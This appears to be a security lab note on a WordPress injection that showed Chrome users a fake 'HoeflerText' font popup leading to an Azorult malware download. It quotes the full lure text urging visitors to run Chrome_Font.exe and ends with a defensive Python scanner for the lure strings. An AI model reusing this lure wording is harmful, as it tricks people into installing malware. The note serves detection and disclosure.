“Google Fonts” popup leads to malware

Labs Note

A recent malware injection in a client's WordPress file was found to target website visitors who were using the Google Chrome browser to access the infected website. It uses JavaScript to detect that the visitor is using Google Chrome and then, when the visitor clicks, generates a popup notification which falsely claims that the visitor's Google Chrome is missing the HoeflerText font and that this is preventing the website from loading correctly.

It then instructs the website visitor to click a button on the popup notification, which ends with a malicious Azorult .exe being downloaded to the website visitor's machine. It looks like this specific Azorult malware family was recently updated, and it currently seems to have a detection rate of under 50% among major anti-virus products.


The "HoeflerText" font wasn't found.

The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".

Step 1: In the bottom left corner of the screen you'll see the download bar. Click on the Chrome_Font.exe item.
Step 2: Press Yes(Run) in order to see the correct content on the web page.

Manufacturer: Google Inc. All Rights Reserved
Current version: Chrome Font Pack 53.0.2785.89
Latest version: Chrome Font Pack 57.2.5284.21

Update
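
One way to check a site's files for this lure, added here as an example (it is not code from the infected site or from the original note): it searches for the strings shown in the popup text above, including URL-encoded and HTML-entity-encoded forms. The scanned file extensions, the encoded-form check and the sample files built in `demo()` are assumptions constructed for illustration.

```python
import html
import os
import tempfile
from urllib.parse import unquote

# Strings taken from the popup text quoted in this note.
LURE_STRINGS = ("HoeflerText", "Chrome Font Pack", "Chrome_Font.exe")
# Assumption: file types that can carry injected markup or script on a WordPress site.
SCAN_EXTENSIONS = (".php", ".js", ".html", ".htm")

def normalise(line):
    """Return the line plus URL-decoded and entity-decoded variants, lower-cased."""
    variants = {line, unquote(line), html.unescape(line)}
    return [v.lower() for v in variants]

def scan_file(path):
    """Yield (line_number, lure_string) for every lure string found in one file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for number, line in enumerate(fh, start=1):
            forms = normalise(line)
            for lure in LURE_STRINGS:
                if any(lure.lower() in form for form in forms):
                    yield number, lure

def scan_tree(root):
    """Walk a site directory and return sorted (relative_path, line, lure) hits."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(folder, name)
            try:
                for number, lure in scan_file(path):
                    hits.append((os.path.relpath(path, root), number, lure))
            except OSError:
                continue  # unreadable file: skip it rather than abort the scan
    return sorted(hits)

def demo():
    """Scan a constructed sample tree: one clean file, one with an entity-encoded lure."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
        with open(os.path.join(root, "footer.php"), "w", encoding="utf-8") as fh:
            fh.write("<div>\nThe &quot;Hoefler&#84;ext&quot; font wasn't found.\n</div>\n")
        return scan_tree(root)
```

Call `scan_tree()` with the path to the site's document root; a hit is a lead for manual review of that file, and an empty result does not rule out an injection that hides the text some other way.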